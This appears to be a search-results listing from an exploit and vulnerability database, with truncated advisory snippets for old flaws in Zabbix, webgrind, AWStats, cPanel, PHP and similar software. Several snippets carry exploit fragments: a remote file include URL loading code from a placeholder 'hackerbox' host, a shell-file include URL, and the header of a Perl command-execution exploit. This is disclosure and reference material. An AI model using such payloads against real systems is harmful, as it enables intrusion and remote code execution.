114 matches found
CVE-2013-6824
Zabbix before 1.8.19rc1, 2.0 before 2.0.10rc1, and 2.2 before 2.2.1rc1 allows remote Zabbix servers and proxies to execute arbitrary commands via a newline in a flexible user parameter...
webgrind 1.0 - 'file' Local File Inclusion
webgrind 1.0 file param Local File Inclusion Vulnerability Vendor: Joakim Nygard and Jacob Oettinger Product web page: http://code.google.com/p/webgrind Affected version: 1.0 v1.02 in trunk on github Summary: Webgrind is an Xdebug profiling web frontend in PHP5. Desc: webgrind suffers from a file...
TBmnetCMS 1.0 Cross Site Scripting
DRUNKEN DANISH REDNECKS: TBmnetCMS 1.0 XSS, "content" parameter in tbmnet.php @...
CVE-2008-2495
CVE-2008-2495 is a directory traversal vulnerability affecting Zina 1.0 RC3. The flaw is in index.php where a .. (dot dot) in the p parameter can be exploited by remote attackers to access files. The NVD entry lists a CVSS2 base score of 7.5 (HIGH) with network attack vector and low complexity, n...
CVE-2008-1384
CVE-2008-1384: In PHP 5.2.5 and earlier, an integer overflow in printf/sprintf formatting (via the php_sprintf_appendstring path in formatted_print.c) can be triggered by a large width specifier, leading to a denial of service and potentially other impact. Affected software is PHP 5.2.5 and olde...
@cid stats v2.3 File Include
@cid stats v2.3 File Include Source Code: http://www.comscripts.com/jump.php?action=script&id=1115 Vulnerable Code: install.php3 In Line 41 : require"'.$repertoire."/".'statsfonctions.php3 Exploit : http://www.VicTim.com/@/install.php3?repertoire=ShElL.txt? Discovered By : Mahmoodali Special...
PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability
No description provided by source. Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...
AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution
#!/usr/bin/perl ---GHC--- Remote command execution exploit Product: Advanced Web Statistics 6.0 - 6.2 URL: http://awstats.sourceforge.net Greets & respects to our friends: 1dt.w0lf and all rst.void.ru Special greets 2 d0G4 & cr0n for link on bugtraq...
Siteman 1.1 - User Database Privilege Escalation (2)
Siteman 1.1 - User Database Privilege Escalation 2 source: https://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. Apparently, an attacker c...
Siteman 1.1 - User Database Privilege Escalation (1)
source: https://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. Apparently, an attacker can supply additional lines to the stream used to...
CVE-2004-1551
Cross-site scripting (XSS) vulnerability in the (1) email or (2) file modules in paFileDB 3.1 Final allows remote attackers to execute arbitrary web script or HTML via the id parameter...
cPanel 5-9 - Passwd SQL Injection
source: https://www.securityfocus.com/bid/10505/info cPanel is reportedly affected by a remote SQL injection vulnerability in the passwd script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. The problem...
Mailtraq 2.2 - 'Browse.asp' Cross-Site Scripting
source: https://www.securityfocus.com/bid/7813/info Mailtraq is vulnerable to cross-site scripting attacks. The vulnerability exists due to insufficient sanitization of HTTP requests to the vulnerable Mailtraq server. An attacker can exploit this vulnerability by manipulating the 'cfolder' URI...
CVE-2002-1019
The library feature for Adobe Content Server 3.0 allows a remote attacker to check out an eBook for an arbitrary length of time via a modified loanMin parameter to download.asp...